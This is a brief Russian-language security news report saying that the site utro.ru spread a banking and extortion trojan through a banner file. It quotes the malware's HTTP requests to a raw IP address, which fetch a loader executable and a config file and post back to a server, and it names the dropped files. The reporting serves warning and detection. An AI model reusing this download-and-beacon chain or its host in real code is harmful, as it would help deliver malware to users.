Сайт utro.ru в течение нескольких часов распространял опасный троян
При подробном изучении троян выполнял следующий запрос:
GET /e1/index.php HTTP/1.1\r\n
Referer: utro.ru/includes5/banners/advert_part.html/r/n
Host: 81.95.149.66\r\n
а дальше происходила загрузка бота:
GET /e1/file.php HTTP/1.1\r\n
GET /ldr1.exe HTTP/1.1\r\n
GET /cfg.bin HTTP/1.0\r\n
POST /s.php?1=april_002fdf3f&i= HTTP/1.0\r\n
В результате атаки, в корне диска с: появлялся файл 3.tmp, который детектируется большинством антивирусов как Trojan-Spy.Win32.Bancos.aam. В windows/system32 записывался файл ntos.exe, который также определялся как Trojan-Spy.Win32.Bancos.aam.
По информации из Лаборатории Касперского троян шифрует пользовательские данные на компьютере и предлагает купить расшифровщик. В случае отказа, грозится выложить приватные данные пользователя в сети интернет.
В результате атаки могли пострадать несколько десятков тысяч пользователей сайта.
www.securitylab.ru